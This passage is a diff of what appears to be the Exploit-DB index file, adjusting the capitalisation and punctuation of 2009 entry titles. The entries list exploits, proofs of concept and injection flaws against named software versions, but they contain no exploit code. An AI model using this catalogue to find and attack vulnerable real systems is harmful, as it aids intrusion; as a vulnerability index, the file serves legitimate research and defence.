0day",2009-09-15,blake,windows,remote,6660 +9673,platforms/windows/remote/9673.py,"BigAnt Server 2.50 - GET Request Remote BOF Exploit (SEH) (0day)",2009-09-15,blake,windows,remote,6660 9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Auth Bypass) SQL Injection Vulnerability",2009-09-15,snakespc,php,webapps,0 9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln",2009-09-15,R3d-D3V!L,asp,webapps,0 9676,platforms/windows/remote/9676.txt,"BRS Webweaver 1.33 /Scripts Access Restriction Bypass Vulnerability",2009-09-15,"Usman Saeed",windows,remote,0 -9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 .M3U File Buffer Overflow POC",2009-09-15,"fl0 fl0w",windows,dos,0 +9677,platforms/windows/dos/9677.c,"HERO SUPER PLAYER 3000 .M3U File Buffer Overflow PoC",2009-09-15,"fl0 fl0w",windows,dos,0 9680,platforms/windows/local/9680.txt,"Protector Plus Antivirus 8/9 Local Privilege Escalation Vulnerability",2009-09-15,"Maxim A. Kulakov",windows,local,0 9681,platforms/php/webapps/9681.txt,"efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability",2009-09-15,"cr4wl3r ",php,webapps,0 9682,platforms/windows/dos/9682.txt,"Adobe ShockWave Player 11.5.1.601 ActiveX Buffer Overflow PoC",2009-09-15,"Francis Provencher",windows,dos,0 @@ -9150,7 +9150,7 @@ id,file,description,date,author,platform,type,port 9691,platforms/windows/dos/9691.pl,"DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit",2009-09-15,prodigy,windows,dos,0 9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 (cat) Remote Blind SQL Injection Vulnerability",2009-09-15,InjEctOr5,php,webapps,0 9693,platforms/php/webapps/9693.txt,"Joomla Component com_djcatalog - SQL/bSQL Injection Vulnerabilities",2009-09-15,"Chip d3 bi0s",php,webapps,0 -9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0 +9694,platforms/windows/remote/9694.txt,"NaviCOPA Web Server 3.01 - Remote Source Code Disclosure Vulnerability",2009-09-16,Dr_IDE,windows,remote,0 9695,platforms/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - (ZIP File) Local Buffer Overflow PoC",2009-09-16,Dr_IDE,windows,dos,0 9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 (Auth Bypass) Remote SQL Injection Vulnerability",2009-09-16,snakespc,php,webapps,0 9697,platforms/php/webapps/9697.txt,"Joomla com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection Vulnerability",2009-09-16,"Chip d3 bi0s",php,webapps,0 @@ -9162,7 +9162,7 @@ id,file,description,date,author,platform,type,port 9703,platforms/php/webapps/9703.txt,"phpPollScript <= 1.3 (include_class) Remote File Inclusion Vulnerability",2009-09-16,"cr4wl3r ",php,webapps,0 9704,platforms/windows/remote/9704.html,"Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BOF Exploit",2009-09-17,"Sebastian Wolfgarten",windows,remote,0 9705,platforms/windows/remote/9705.html,"Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit",2009-09-17,bmgsec,windows,remote,0 -9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal vulnerability",2009-09-17,DreamTurk,php,webapps,0 +9706,platforms/php/webapps/9706.txt,"joomla component com_album 1.14 - Directory Traversal Vulnerability",2009-09-17,DreamTurk,php,webapps,0 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 (.wav file) Local Crash PoC",2009-09-17,zAx,windows,dos,0 9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b (pageHeader.php path) RFI Vulnerability",2009-09-17,"EA Ngel",php,webapps,0 9709,platforms/linux/local/9709.txt,"Changetrack 4.3-3 - Local Privilege Escalation Vulnerability",2009-09-17,Rick,linux,local,0 @@ -9190,13 +9190,13 @@ id,file,description,date,author,platform,type,port 9732,platforms/multiple/webapps/9732.txt,"Joomla component com_jinc 0.2 - (newsid) Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9733,platforms/multiple/webapps/9733.pl,"Joomla component com_mytube (user_id) 1.0 Beta - Blind SQL Injection Vulnerability",2009-09-21,"Chip d3 bi0s",multiple,webapps,0 9734,platforms/windows/dos/9734.py,"BigAnt Server <= 2.50 SP6 - Local (ZIP File) Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 -9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 -9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 -9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler exploit",2009-09-29,bruiser,windows,remote,0 +9800,platforms/windows/remote/9800.cpp,"Serv-u web client 9.0.0.5 Buffer overflow",2009-11-05,"Megumi Yanagishita",windows,remote,80 +9801,platforms/php/webapps/9801.txt,"FlatPress 0.804 - 0.812.1 - Local File Inclusion Vulnerability",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 +9802,platforms/windows/remote/9802.html,"IBM Installation Manager <= 1.3.0 iim:// URI handler Exploit",2009-09-29,bruiser,windows,remote,0 9803,platforms/windows/remote/9803.html,"EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Exploit",2009-09-29,pyrokinesis,windows,remote,0 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server <= 5.8.0 DoS",2009-11-10,zhangmc,windows,dos,21 -9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE exploit",2009-09-29,pyrokinesis,windows,remote,0 -9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 +9805,platforms/windows/remote/9805.html,"Oracle Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 +9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation PoC",2009-09-29,pyrokinesis,windows,dos,0 9807,platforms/windows/local/9807.txt,"Adobe Photoshop Elements 8.0 Active File Monitor Privilege Escalation",2009-09-29,pyrokinesis,windows,local,0 9809,platforms/asp/webapps/9809.txt,"HEAT Call Logging 8.01 SQL Injection",2009-09-28,"0 0",asp,webapps,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4 / 7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 @@ -9204,9 +9204,9 @@ id,file,description,date,author,platform,type,port 9812,platforms/php/webapps/9812.txt,"Joomla IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Remote Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351",2009-09-25,Dr_IDE,windows,remote,0 -9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 local buffer overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 -9816,platforms/windows/remote/9816.py,"VLC Media Player 1.0.2 smb:// URI stack overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 -9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 'create new site' local buffer overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 +9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 local Buffer Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 +9816,platforms/windows/remote/9816.py,"VLC Media Player 1.0.2 smb:// URI Stack Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 +9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 'create new site' local Buffer Overflow PoC",2009-09-25,Dr_IDE,windows,remote,0 9818,platforms/php/webapps/9818.txt,"Klonet E-Commerce products.php SQL Injection",2009-09-25,S3T4N,php,webapps,0 9819,platforms/multiple/webapps/9819.txt,"Engeman 6.x.x SQL Injection",2009-09-25,crashbrz,multiple,webapps,0 9820,platforms/php/webapps/9820.txt,"Regental Medien Blind SQL Injection",2009-09-24,NoGe,php,webapps,0 @@ -9228,7 +9228,7 @@ id,file,description,date,author,platform,type,port 9837,platforms/php/webapps/9837.txt,"BPStudent 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 9838,platforms/php/webapps/9838.pl,"BPGames 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",php,webapps,0 9839,platforms/php/webapps/9839.txt,"Achievo 1.3.4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 -9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 +9840,platforms/php/webapps/9840.txt,"Joomla GroupJive 1.8 B4 - Remote File Inclusion",2009-09-22,M3NW5,php,webapps,0 9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - .blend File Command Injection",2009-11-05,"Core Security",multiple,remote,0 @@ -9240,13 +9240,13 @@ id,file,description,date,author,platform,type,port 9851,platforms/windows/remote/9851.pl,"Xion Audio Player 1.0 121 .m3u file Buffer Overflow",2009-11-03,corelanc0d3r,windows,remote,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 'SITE INDEX' Command Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 9853,platforms/windows/remote/9853.rb,"Symantec ConsoleUtilities ActiveX Buffer Overflow",2009-11-02,"Nikolas Sotiriu",windows,remote,0 -9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal exploit",2009-11-02,blake,php,webapps,0 +9854,platforms/php/webapps/9854.txt,"tftgallery .13 - Directory Traversal Exploit",2009-11-02,blake,php,webapps,0 9855,platforms/php/webapps/9855.txt,"Geeklog <= 1.6.0sr2 - Remote File Upload",2009-10-03,JaL0h,php,webapps,0 -9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 +9856,platforms/asp/webapps/9856.txt,"Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,"Andrea Fabrizi",asp,webapps,0 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - XSS",2009-10-05,"Sébastien Duquette",asp,webapps,0 9858,platforms/hardware/remote/9858.txt,"Riorey RIOS Hardcoded Password Vulnerability 4.7.0",2009-10-08,"Marek Kroemeke",hardware,remote,8022 -9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 -9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9859,platforms/freebsd/local/9859.c,"FreeBSD 6.4 pipeclose()/knlist_cleardel() race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 +9860,platforms/freebsd/local/9860.c,"FreeBSD 7.2 VFS/devfs race condition Exploit",2009-10-08,"Przemyslaw Frasunek",freebsd,local,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 statuswml.cgi Command Injection",2009-10-30,"H D Moore",unix,webapps,0 9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect code execution",2009-10-19,"Andrea Fabizi",hardware,remote,0 9863,platforms/php/webapps/9863.txt,"Achievo <= 1.3.4 xss",2009-10-14,"Ryan Dewhurst",php,webapps,0 @@ -9270,7 +9270,7 @@ id,file,description,date,author,platform,type,port 9887,platforms/jsp/webapps/9887.txt,"jetty 6.x - 7.x - xss, information disclosure, injection",2009-10-26,"Antonion Parata",jsp,webapps,0 9888,platforms/php/webapps/9888.txt,"Joomla Ajax Chat 1.0 remote file inclusion",2009-10-19,kaMtiEz,php,webapps,0 9889,platforms/php/webapps/9889.txt,"Joomla Book Library 1.0 file inclusion",2009-10-19,kaMtiEz,php,webapps,0 -9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 +9890,platforms/php/webapps/9890.txt,"Joomla JD-WordPress 2.0 RC2 - Remote file icnlusion",2009-10-19,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80 @@ -9284,7 +9284,7 @@ id,file,description,date,author,platform,type,port 9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 BoF",2009-10-26,"karak0rsan, murderkey",windows,remote,80 9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - xss, SQL injection",2009-10-20,"Amol Naik",php,webapps,0 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection Vulnerability",2009-10-30,"Securitylab Research",asp,webapps,0 -9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 - 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521 +9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow Vulnerability",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 Cache Lite Output Remote File Inclusion",2008-06-14,MC,php,webapps,0 9907,platforms/cgi/webapps/9907.rb,"The Matt Wright guestbook.pl <= 2.3.1 - Server Side Include Vulnerability",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE <= 1.2.4 base_qry_common.php Remote File Inclusion",2008-06-14,MC,php,webapps,0 @@ -9334,13 +9334,13 @@ id,file,description,date,author,platform,type,port 9955,platforms/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 privilege escalation",2009-10-20,trompele,hardware,local,0 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 DoS",2009-10-14,"Townsend Harris",hardware,dos,0 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 PoC BoF",2009-10-23,"Francis Provencher",windows,remote,0 -9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 xss and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 +9958,platforms/jsp/webapps/9958.txt,"Pentaho <= 1.7.0.1062 - XSS and information disclosure",2009-10-15,antisnatchor,jsp,webapps,0 9961,platforms/php/webapps/9961.txt,"phpCMS 2008 file disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 9962,platforms/php/webapps/9962.txt,"Piwik <= 1357 2009-08-02 file upload and code execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 store() SQL injection",2009-10-26,bookoo,php,webapps,0 9965,platforms/php/webapps/9965.txt,"RunCMS 2ma post.php SQL injection",2009-10-26,bookoo,php,webapps,0 -9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 +9966,platforms/windows/remote/9966.txt,"Serv-u web client 9.0.0.5 Buffer overflow",2009-11-02,"Nikolas Rangos",windows,remote,80 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 Team Services source code disclosure",2009-10-26,"Daniel Martin",asp,webapps,0 9969,platforms/multiple/dos/9969.txt,"Snort <= 2.8.5 - IPv6 DoS",2009-10-23,"laurent gaffie",multiple,dos,0 9970,platforms/windows/local/9970.txt,"South River Technologies WebDrive 9.02 build 2232 - Privilege Escalation",2009-10-20,"bellick ",windows,local,0 @@ -9352,9 +9352,9 @@ id,file,description,date,author,platform,type,port 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 9980,platforms/hardware/webapps/9980.txt,"Websense Email Security DoS",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 -9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file buffer overflow",2009-10-16,"Dragon Rider",windows,local,0 +9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer overflow",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0 -9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 +9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0 @@ -9372,7 +9372,7 @@ id,file,description,date,author,platform,type,port 10002,platforms/php/webapps/10002.txt,"CuteNews and UTF-8 CuteNews Multiple Security Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps,0 10003,platforms/php/webapps/10003.txt,"Docebo 3.6.0.3 - Multiple SQL-Injection Vulnerabilities",2009-10-09,"Andrea Fabrizi",php,webapps,0 10004,platforms/multiple/dos/10004.txt,"Dopewars 1.5.12 Server Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 -10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 +10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0 @@ -9380,7 +9380,7 @@ id,file,description,date,author,platform,type,port 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 10012,platforms/multiple/webapps/10012.py,"html2ps 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0 -10014,platforms/multiple/dos/10014.txt,"IPsec-Tools Prior to 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0 +10014,platforms/multiple/dos/10014.txt,"IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0 10015,platforms/multiple/remote/10015.txt,"ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability",2009-11-10,"Jon Oberheide",multiple,remote,67 10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 1.5 - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 @@ -9411,7 +9411,7 @@ id,file,description,date,author,platform,type,port 10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0 10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0 10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0 -10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 +10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80 10049,platforms/php/webapps/10049.pl,"EZsneezyCal CMS 95.1-95.2 File Inclusion Vulnerability",2009-10-12,kaMtiEz,php,webapps,0 10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - File Inclusion Vulnerability",2009-10-12,kaMtiEz,php,webapps,0 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - XSS/CSRF/LFI/Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 @@ -9430,13 +9430,13 @@ id,file,description,date,author,platform,type,port 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 -10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0 +10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer Overflow Exploit",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0 10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 -10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 -10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext local kernel root exploit",2009-10-02,mu-b,osx,local,0 +10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 +10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext local kernel root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser remote command execution",2009-10-01,pyrokinesis,windows,remote,0 @@ -9467,7 +9467,7 @@ id,file,description,date,author,platform,type,port 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10107,platforms/windows/local/10107.pl,"Icarus 2.0 (.pgn File) Universal Local Buffer Overflow Exploit (SEH)",2009-11-17,"D3V!L FUCK3R",windows,local,0 -10160,platforms/windows/dos/10160.py,"FtpXQ authenticated remote Dos",2009-11-17,"Marc Doudiet",windows,dos,21 +10160,platforms/windows/dos/10160.py,"FtpXQ authenticated remote DoS",2009-11-17,"Marc Doudiet",windows,dos,21 10161,platforms/asp/webapps/10161.txt,"JBS 2.0 / JBSX - Administration panel Bypass and File Upload Vulnerability",2009-11-17,blackenedsecurity,asp,webapps,0 10162,platforms/windows/remote/10162.py,"Home FTP Server 'MKD' Command Directory Traversal Vulnerability",2009-11-17,zhangmc,windows,remote,21 10163,platforms/windows/dos/10163.pl,"Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability",2009-11-17,karak0rsan,windows,dos,80 @@ -9475,7 +9475,7 @@ id,file,description,date,author,platform,type,port 10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript(aid) Blind SQL Injection Vulnerability",2009-11-17,"Hussin X",php,webapps,0 10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 (default.asp) Blind SQL Injection Vulnerability",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids (default.asp) Blind SQL Injection Vulnerability",2009-11-17,"Hussin X",asp,webapps,0 -10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / Xss Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 +10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / XSS Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service (0day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 @@ -9489,7 +9489,7 @@ id,file,description,date,author,platform,type,port 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 -10187,platforms/bsd/dos/10187.txt,"Opera 10.01 Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 +10187,platforms/bsd/dos/10187.txt,"Opera 10.01 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 10189,platforms/php/webapps/10189.txt,"Betsy CMS versions <= 3.5 - Local File Inclusion Vulnerability",2009-11-21,MizoZ,php,webapps,0 10190,platforms/windows/dos/10190.txt,"Cisco VPN Client Integer Overflow (DOS)",2009-11-21,"Alex Hernandez",windows,dos,0 10192,platforms/php/webapps/10192.txt,"Joomla Component Com_Joomclip (cat) SQL injection",2009-11-21,"599eme Man",php,webapps,0 @@ -9515,7 +9515,7 @@ id,file,description,date,author,platform,type,port 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS Vulnerability",2009-11-24,leinakesi,windows,dos,21 10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection Vulnerability",2009-11-24,ViRuS_HiMa,php,webapps,0 10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21 -10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0 +10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 - CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection Vulnerability",2009-11-25,S@BUN,php,webapps,0 @@ -9529,7 +9529,7 @@ id,file,description,date,author,platform,type,port 10235,platforms/windows/remote/10235.py,"Eureka Mail Client Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload 